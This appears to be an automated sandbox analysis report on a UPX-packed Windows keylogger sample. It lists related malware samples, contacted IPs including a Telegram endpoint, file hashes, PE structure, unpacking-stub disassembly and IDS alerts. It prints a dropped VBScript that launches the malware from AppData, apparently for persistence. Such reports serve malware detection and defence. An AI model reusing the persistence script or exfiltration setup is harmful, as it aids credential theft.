                                                                                                              Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 132.226.247.73
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adPO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 188.114.96.3
                                                                                                              image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              3b5074b1b5d032e5620f69f9f700ff0e2Mi3lKoJfj.exeGet hashmaliciousQuasarBrowse
                                                                                                              • 149.154.167.220
                                                                                                              RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              ogVinh0jhq.exeGet hashmaliciousDCRatBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Sylacauga AL License.msgGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 149.154.167.220
                                                                                                              image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              NOTIFICATION_OF_DEPENDANTS_1.vbsGet hashmaliciousXmrigBrowse
                                                                                                              • 149.154.167.220
                                                                                                              No context
                                                                                                              Process:C:\Users\user\Desktop\FACT0987789000900.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):202424
                                                                                                              Entropy (8bit):7.98496561474961
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:HsqRLT5hm7qJvUW7JOQVnr2R+UtSXAU3xRgO5aIf:HJRLrmWXNznScUtmA6CO48
                                                                                                              MD5:680BA9E14DFE80F9E58D784B4A8B4812
                                                                                                              SHA1:D269305611A554ABC239C8E5011045A67F0315E7
                                                                                                              SHA-256:057F87AE282514DCE6DC80C50372A1F0F0B0CE5889A0B1BC6EE8D340C53FF310
                                                                                                              SHA-512:3A5BAD82E729E15126C687440B40331AE5D3DEB774366875F00D5067C4FEB0A3FF64336C15BA853CA99F87BBA6DA8AC21E0D91749C487C1958B7741024D050BC
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:EA06.....C...U..K...}.6.I.V*....I..u..2.2.Rh..y....{..2.F.W..Y.......[..A6.N.sY..A_.J..i..A...,.....9..n.X.k8..cu.%>.....g.u..7..._,..6...4.M.R..I/.M7.[..w9....{..s/.Q7s{..E'.Hu....e8..r.<.U-.N.r@......M......W..f5.......t.W.M..J..T`....9( .'..L@fT...aS.Mj...../.I6..h5*^..R...T.M..G..$..Mn.Z..B..a.%J.2.......D...}.....Z.i......Z.....D.s..4_m.Y2.........1..".X...|6.M.qy..*.YE.........*.(.L9.@...X..oU...H.&f...-..X..&..X._....>....A(..)t...MZ..k@.......E&..M.........zq;.B1_..[...\..)\.5z.F.Mr2:$.iL.x .......f..w...a......2..g.+..W5..(.*gf....P.lo........V......X.y....Q..4..?..M.....v..^..+...g-b......~.T.k..Z..Q[..p3.e.sX..e.(.....i.U...aE..y.....U`uJ.q..rq.....!.C.t...+..b..g.i[.."4.O2=o..z.p.B5..@;.X.F.E.fmZ\......}....q!./...(.r..*O.Gu.o..o.8..Q..L.+1[.t6..'.+...y.Q.k..X...E...T.}..R.R....cc..o&.y.....s*E'.-.M...%.....@...>.D.U.[...C.[.U.-..v.Zu...V.!..z.oB...Pf..O.KW.U&..m..D...9.lR)....i.D....x]......&*1.&...,u../T.aOc\.uKi......z...
                                                                                                              Process:C:\Users\user\AppData\Local\thixolabile\juvenile.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):202424
                                                                                                              Entropy (8bit):7.98496561474961
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:HsqRLT5hm7qJvUW7JOQVnr2R+UtSXAU3xRgO5aIf:HJRLrmWXNznScUtmA6CO48
                                                                                                              MD5:680BA9E14DFE80F9E58D784B4A8B4812
                                                                                                              SHA1:D269305611A554ABC239C8E5011045A67F0315E7
                                                                                                              SHA-256:057F87AE282514DCE6DC80C50372A1F0F0B0CE5889A0B1BC6EE8D340C53FF310
                                                                                                              SHA-512:3A5BAD82E729E15126C687440B40331AE5D3DEB774366875F00D5067C4FEB0A3FF64336C15BA853CA99F87BBA6DA8AC21E0D91749C487C1958B7741024D050BC
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:EA06.....C...U..K...}.6.I.V*....I..u..2.2.Rh..y....{..2.F.W..Y.......[..A6.N.sY..A_.J..i..A...,.....9..n.X.k8..cu.%>.....g.u..7..._,..6...4.M.R..I/.M7.[..w9....{..s/.Q7s{..E'.Hu....e8..r.<.U-.N.r@......M......W..f5.......t.W.M..J..T`....9( .'..L@fT...aS.Mj...../.I6..h5*^..R...T.M..G..$..Mn.Z..B..a.%J.2.......D...}.....Z.i......Z.....D.s..4_m.Y2.........1..".X...|6.M.qy..*.YE.........*.(.L9.@...X..oU...H.&f...-..X..&..X._....>....A(..)t...MZ..k@.......E&..M.........zq;.B1_..[...\..)\.5z.F.Mr2:$.iL.x .......f..w...a......2..g.+..W5..(.*gf....P.lo........V......X.y....Q..4..?..M.....v..^..+...g-b......~.T.k..Z..Q[..p3.e.sX..e.(.....i.U...aE..y.....U`uJ.q..rq.....!.C.t...+..b..g.i[.."4.O2=o..z.p.B5..@;.X.F.E.fmZ\......}....q!./...(.r..*O.Gu.o..o.8..Q..L.+1[.t6..'.+...y.Q.k..X...E...T.}..R.R....cc..o&.y.....s*E'.-.M...%.....@...>.D.U.[...C.[.U.-..v.Zu...V.!..z.oB...Pf..O.KW.U&..m..D...9.lR)....i.D....x]......&*1.&...,u../T.aOc\.uKi......z...
                                                                                                              Process:C:\Users\user\AppData\Local\thixolabile\juvenile.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):202424
                                                                                                              Entropy (8bit):7.98496561474961
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:HsqRLT5hm7qJvUW7JOQVnr2R+UtSXAU3xRgO5aIf:HJRLrmWXNznScUtmA6CO48
                                                                                                              MD5:680BA9E14DFE80F9E58D784B4A8B4812
                                                                                                              SHA1:D269305611A554ABC239C8E5011045A67F0315E7
                                                                                                              SHA-256:057F87AE282514DCE6DC80C50372A1F0F0B0CE5889A0B1BC6EE8D340C53FF310
                                                                                                              SHA-512:3A5BAD82E729E15126C687440B40331AE5D3DEB774366875F00D5067C4FEB0A3FF64336C15BA853CA99F87BBA6DA8AC21E0D91749C487C1958B7741024D050BC
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:EA06.....C...U..K...}.6.I.V*....I..u..2.2.Rh..y....{..2.F.W..Y.......[..A6.N.sY..A_.J..i..A...,.....9..n.X.k8..cu.%>.....g.u..7..._,..6...4.M.R..I/.M7.[..w9....{..s/.Q7s{..E'.Hu....e8..r.<.U-.N.r@......M......W..f5.......t.W.M..J..T`....9( .'..L@fT...aS.Mj...../.I6..h5*^..R...T.M..G..$..Mn.Z..B..a.%J.2.......D...}.....Z.i......Z.....D.s..4_m.Y2.........1..".X...|6.M.qy..*.YE.........*.(.L9.@...X..oU...H.&f...-..X..&..X._....>....A(..)t...MZ..k@.......E&..M.........zq;.B1_..[...\..)\.5z.F.Mr2:$.iL.x .......f..w...a......2..g.+..W5..(.*gf....P.lo........V......X.y....Q..4..?..M.....v..^..+...g-b......~.T.k..Z..Q[..p3.e.sX..e.(.....i.U...aE..y.....U`uJ.q..rq.....!.C.t...+..b..g.i[.."4.O2=o..z.p.B5..@;.X.F.E.fmZ\......}....q!./...(.r..*O.Gu.o..o.8..Q..L.+1[.t6..'.+...y.Q.k..X...E...T.}..R.R....cc..o&.y.....s*E'.-.M...%.....@...>.D.U.[...C.[.U.-..v.Zu...V.!..z.oB...Pf..O.KW.U&..m..D...9.lR)....i.D....x]......&*1.&...,u../T.aOc\.uKi......z...
                                                                                                              Process:C:\Users\user\Desktop\FACT0987789000900.exe
                                                                                                              File Type:data
                                                                                                              Category:modified
                                                                                                              Size (bytes):208384
                                                                                                              Entropy (8bit):7.840428585900424
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:Umk3sCWAHAe8PggU+u5FVeKS3+2g+ELRkIXrdE9lsHmA+fZGA9NKNqH0qPSiUFC3:94VmLU+geznkzW9yHm5fZfMIRPqc
                                                                                                              MD5:1DE0DE821CDC7ED14FF1BFD93026DB40
                                                                                                              SHA1:FB5AB1B9E9414A01A2DBCD484F83FCB3C16D64DA
                                                                                                              SHA-256:F45668DCACB906045ACEAB063720F682868D9A411DD9E646E5A6FC8067B37EB5
                                                                                                              SHA-512:D9D7F29D65A4FC4541FD9F753B19D0ECB6C359CFA84352DEF53CD26DF21F8C3EE002DE834D587793B6DBE5743B147378BFE4C9860CE36989C04CB1D5A4EE2F02
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:...QJERK]ZPG..JI.XWQT5QI.RKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5.IEREF.^G.;.h.Y..ua9 6r;+575 _j*'69> .3,e >7z9)av..f5851.\DOvKYZPGA2"Y.u{ .K}8.,g(..ubM4v7.)Z./b4.5u+.9.C.7t{9/HD.7wq"'.!.?.i28u&.*g8*-~:.$PGA2JIFXWQT5QIER...6GA2J..XW.U1Q=.R.YZPGA2JI.XtP_4XIE.JYZ.FA2JIFw.QT5AIER.XZPG.2JYFXWST5TIERKYZPBA2JIFXWQ$6QIARK.aRGC2J.FXGQT%QIER[YZ@GA2JIFHWQT5QIERKYZ.RC2.IFXW1V5]DDRKYZPGA2JIFXWQT5QIERKYZPG..KIZXWQT5QIERKYZPGA2JIFXWQT5QIE.F[Z.GA2JIFXWQT5Q.DR.XZPGA2JIFXWQT5QIERKYZPGA2JIh,2) 5QI].JYZ@GA2.HFXSQT5QIERKYZPGA2jIF8y#0T%(ER.4ZPG.3JI(XWQ.4QIERKYZPGA2JI.XW.zQ0=$RKY.`GA2jKFXAQT5[KERKYZPGA2JIFX.QT..;6 (YZPKL3JI&ZWQZ4QIePKYZPGA2JIFXWQ.5Q.ERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPG
                                                                                                              Process:C:\Users\user\Desktop\FACT0987789000900.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                              Category:modified
                                                                                                              Size (bytes):641024
                                                                                                              Entropy (8bit):7.940235184135823
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:ROv5jKhsfoPA+yeVKUCUxP4C902bdRtJJPifIl4AbNfoQ+MvFE7v44OzNRlwDmt:Rq5TfcdHj4fmbMo3Jhuv44O5fwY
                                                                                                              MD5:E4DA22458C317595E4BD6712B4728D36
                                                                                                              SHA1:111A5C4CBD45BCED7C04CBEB5192A9AFE178865C
                                                                                                              SHA-256:F3530F9D52D1BA3ED70CC5D603CF0A83771027CDA5FD545206E1688589EF69FD
                                                                                                              SHA-512:B19D9EB5E06834538E8CA5E8655E360B56D63C8AD67441607279C18A848D46A6095B6CBE7019FC79EBA784392278E30134E7AEF149D0E12964D0B86ECD08DC1D
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 71%
                                                                                                              Reputation:low
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L...5.Fg.........."......P........................@.......................................@...@.......@.....................L...$.......L|..................p.......................................t...H...........................................UPX0....................................UPX1.....P.......B..................@....rsrc................F..............@......................................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
                                                                                                              Process:C:\Users\user\AppData\Local\thixolabile\juvenile.exe
                                                                                                              File Type:data
                                                                                                              Category:modified
                                                                                                              Size (bytes):288
                                                                                                              Entropy (8bit):3.4287539401128218
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:DMM8lfm3OOQdUfclMMlW8g1UEZ+lX1sWpAdA6nriIM8lfQVn:DsO+vNlMkXg1Q1IFmA2n
                                                                                                              MD5:2517302B44120881D322AB75BF87762B
                                                                                                              SHA1:82EBAE9A881FFF27939C491FB07BD939D71C27AC
                                                                                                              SHA-256:48009D6ADB415A2E675B504C4AC960327D9E4ABAC979DD0BEC274F782B0C68E6
                                                                                                              SHA-512:819A5B86B0375C85B5EB50AAC8E7003B36B741FD02AEE51627B1FAD1813A60617A3658D485DE7317C99CDA83878B19D287FFC3561D08E6B7930F6B859294CB3C
                                                                                                              Malicious:true
                                                                                                              Reputation:low
                                                                                                              Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.t.h.i.x.o.l.a.b.i.l.e.\.j.u.v.e.n.i.l.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                              Entropy (8bit):7.940235184135823
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.39%
                                                                                                              • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                                                              • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              File name:FACT0987789000900.exe
                                                                                                              File size:641'024 bytes
                                                                                                              MD5:e4da22458c317595e4bd6712b4728d36
                                                                                                              SHA1:111a5c4cbd45bced7c04cbeb5192a9afe178865c
                                                                                                              SHA256:f3530f9d52d1ba3ed70cc5d603cf0a83771027cda5fd545206e1688589ef69fd
                                                                                                              SHA512:b19d9eb5e06834538e8ca5e8655e360b56d63c8ad67441607279c18a848d46a6095b6cbe7019fc79eba784392278e30134e7aef149d0e12964d0b86ecd08dc1d
                                                                                                              SSDEEP:12288:ROv5jKhsfoPA+yeVKUCUxP4C902bdRtJJPifIl4AbNfoQ+MvFE7v44OzNRlwDmt:Rq5TfcdHj4fmbMo3Jhuv44O5fwY
                                                                                                              TLSH:BFD4238164D4C862EAB13731807ACFD51A657F71DDC8279E27C9F54AB8A23835882B3D
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                                                              Icon Hash:aaf3e3e3938382a0
                                                                                                              Entrypoint:0x51ff90
                                                                                                              Entrypoint Section:UPX1
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x6746EB35 [Wed Nov 27 09:49:41 2024 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:5
                                                                                                              OS Version Minor:1
                                                                                                              File Version Major:5
                                                                                                              File Version Minor:1
                                                                                                              Subsystem Version Major:5
                                                                                                              Subsystem Version Minor:1
                                                                                                              Import Hash:ef471c0edf1877cd5a881a6a8bf647b9
                                                                                                              Instruction
                                                                                                              pushad
                                                                                                              mov esi, 004CC000h
                                                                                                              lea edi, dword ptr [esi-000CB000h]
                                                                                                              push edi
                                                                                                              jmp 00007F8ED8CB5B2Dh
                                                                                                              nop
                                                                                                              mov al, byte ptr [esi]
                                                                                                              inc esi
                                                                                                              mov byte ptr [edi], al
                                                                                                              inc edi
                                                                                                              add ebx, ebx
                                                                                                              jne 00007F8ED8CB5B29h
                                                                                                              mov ebx, dword ptr [esi]
                                                                                                              sub esi, FFFFFFFCh
                                                                                                              adc ebx, ebx
                                                                                                              jc 00007F8ED8CB5B0Fh
                                                                                                              mov eax, 00000001h
                                                                                                              add ebx, ebx
                                                                                                              jne 00007F8ED8CB5B29h
                                                                                                              mov ebx, dword ptr [esi]
                                                                                                              sub esi, FFFFFFFCh
                                                                                                              adc ebx, ebx
                                                                                                              adc eax, eax
                                                                                                              add ebx, ebx
                                                                                                              jnc 00007F8ED8CB5B2Dh
                                                                                                              jne 00007F8ED8CB5B4Ah
                                                                                                              mov ebx, dword ptr [esi]
                                                                                                              sub esi, FFFFFFFCh
                                                                                                              adc ebx, ebx
                                                                                                              jc 00007F8ED8CB5B41h
                                                                                                              dec eax
                                                                                                              add ebx, ebx
                                                                                                              jne 00007F8ED8CB5B29h
                                                                                                              mov ebx, dword ptr [esi]
                                                                                                              sub esi, FFFFFFFCh
                                                                                                              adc ebx, ebx
                                                                                                              adc eax, eax
                                                                                                              jmp 00007F8ED8CB5AF6h
                                                                                                              add ebx, ebx
                                                                                                              jne 00007F8ED8CB5B29h
                                                                                                              mov ebx, dword ptr [esi]
                                                                                                              sub esi, FFFFFFFCh
                                                                                                              adc ebx, ebx
                                                                                                              adc ecx, ecx
                                                                                                              jmp 00007F8ED8CB5B74h
                                                                                                              xor ecx, ecx
                                                                                                              sub eax, 03h
                                                                                                              jc 00007F8ED8CB5B33h
                                                                                                              shl eax, 08h
                                                                                                              mov al, byte ptr [esi]
                                                                                                              inc esi
                                                                                                              xor eax, FFFFFFFFh
                                                                                                              je 00007F8ED8CB5B97h
                                                                                                              sar eax, 1
                                                                                                              mov ebp, eax
                                                                                                              jmp 00007F8ED8CB5B2Dh
                                                                                                              add ebx, ebx
                                                                                                              jne 00007F8ED8CB5B29h
                                                                                                              mov ebx, dword ptr [esi]
                                                                                                              sub esi, FFFFFFFCh
                                                                                                              adc ebx, ebx
                                                                                                              jc 00007F8ED8CB5AEEh
                                                                                                              inc ecx
                                                                                                              add ebx, ebx
                                                                                                              jne 00007F8ED8CB5B29h
                                                                                                              mov ebx, dword ptr [esi]
                                                                                                              sub esi, FFFFFFFCh
                                                                                                              adc ebx, ebx
                                                                                                              jc 00007F8ED8CB5AE0h
                                                                                                              add ebx, ebx
                                                                                                              jne 00007F8ED8CB5B29h
                                                                                                              mov ebx, dword ptr [esi]
                                                                                                              sub esi, FFFFFFFCh
                                                                                                              adc ebx, ebx
                                                                                                              adc ecx, ecx
                                                                                                              add ebx, ebx
                                                                                                              jnc 00007F8ED8CB5B11h
                                                                                                              jne 00007F8ED8CB5B2Bh
                                                                                                              mov ebx, dword ptr [esi]
                                                                                                              sub esi, FFFFFFFCh
                                                                                                              adc ebx, ebx
                                                                                                              jnc 00007F8ED8CB5B06h
                                                                                                              add ecx, 02h
                                                                                                              cmp ebp, FFFFFB00h
                                                                                                              adc ecx, 02h
                                                                                                              lea edx, dword ptr [edi+ebp]
                                                                                                              cmp ebp, FFFFFFFCh
                                                                                                              jbe 00007F8ED8CB5B30h
                                                                                                              mov al, byte ptr [edx]
                                                                                                              Programming Language:
                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                              • [ASM] VS2012 UPD4 build 61030
                                                                                                              • [RES] VS2012 UPD4 build 61030
                                                                                                              • [LNK] VS2012 UPD4 build 61030
                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x168c4c0x424.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1210000x47c4c.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1690700x18.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1201740x48UPX1
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              UPX00x10000xcb0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              UPX10xcc0000x550000x54200b4181e404c9ee33de96861450fa4dd59False0.9888239459509658data7.937029299204728IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rsrc0x1210000x490000x48200a4545d1e2fb0f20d8d4f7c21509cc457False0.9290815912045061data7.897947363616148IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_ICON0x1215ac0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                              RT_ICON0x1216d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                              RT_ICON0x1218040x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                              RT_ICON0x1219300x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                              RT_ICON0x121c1c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                              RT_ICON0x121d480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                              RT_ICON0x122bf40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                              RT_ICON0x1234a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                              RT_ICON0x123a0c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                              RT_ICON0x125fb80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                              RT_ICON0x1270640x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                              RT_MENU0xca4a00x50emptyEnglishGreat Britain0
                                                                                                              RT_STRING0xca4f00x594emptyEnglishGreat Britain0
                                                                                                              RT_STRING0xcaa840x68aemptyEnglishGreat Britain0
                                                                                                              RT_STRING0xcb1100x490emptyEnglishGreat Britain0
                                                                                                              RT_STRING0xcb5a00x5fcemptyEnglishGreat Britain0
                                                                                                              RT_STRING0xcbb9c0x65cemptyEnglishGreat Britain0
                                                                                                              RT_STRING0xcc1f80x466dataEnglishGreat Britain1.0097690941385435
                                                                                                              RT_STRING0xcc6600x158dataEnglishGreat Britain1.0319767441860466
                                                                                                              RT_RCDATA0x1274d00x41221data1.0003410986374797
                                                                                                              RT_GROUP_ICON0x1686f80x76dataEnglishGreat Britain0.6610169491525424
                                                                                                              RT_GROUP_ICON0x1687740x14dataEnglishGreat Britain1.25
                                                                                                              RT_GROUP_ICON0x16878c0x14dataEnglishGreat Britain1.15
                                                                                                              RT_GROUP_ICON0x1687a40x14dataEnglishGreat Britain1.25
                                                                                                              RT_VERSION0x1687bc0xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                              RT_MANIFEST0x16889c0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814
                                                                                                              DLLImport
                                                                                                              KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                                                                                              ADVAPI32.dllAddAce
                                                                                                              COMCTL32.dllImageList_Remove
                                                                                                              COMDLG32.dllGetSaveFileNameW
                                                                                                              GDI32.dllLineTo
                                                                                                              IPHLPAPI.DLLIcmpSendEcho
                                                                                                              MPR.dllWNetUseConnectionW
                                                                                                              ole32.dllCoGetObject
                                                                                                              OLEAUT32.dllVariantInit
                                                                                                              PSAPI.DLLGetProcessMemoryInfo
                                                                                                              SHELL32.dllDragFinish
                                                                                                              USER32.dllGetDC
                                                                                                              USERENV.dllLoadUserProfileW
                                                                                                              UxTheme.dllIsThemeActive
                                                                                                              VERSION.dllVerQueryValueW
                                                                                                              WININET.dllFtpOpenFileW
                                                                                                              WINMM.dlltimeGetTime
                                                                                                              WSOCK32.dllsocket
                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishGreat Britain
                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2025-01-03T09:21:12.250715+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749710132.226.247.7380TCP
                                                                                                              2025-01-03T09:21:14.219632+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749710132.226.247.7380TCP
                                                                                                              2025-01-03T09:21:14.784640+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749727188.114.96.3443TCP
                                                                                                              2025-01-03T09:21:15.532027+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749733132.226.247.7380TCP
                                                                                                              2025-01-03T09:21:17.391864+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749746188.114.96.3443TCP
                                                                                                              2025-01-03T09:21:20.007393+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749768188.114.96.3443TCP
                                                                                                              2025-01-03T09:21:21.295929+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749778188.114.96.3443TCP
                                                                                                              2025-01-03T09:21:22.599107+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749788188.114.96.3443TCP
                                                                                                              2025-01-03T09:21:24.016481+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749797188.114.96.3443TCP
                                                                                                              2025-01-03T09:21:24.500797+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749802132.226.247.7380TCP
                                                                                                              2025-01-03T09:21:25.002783+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.749806149.154.167.220443TCP
                                                                                                              2025-01-03T09:21:25.813329+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749802132.226.247.7380TCP
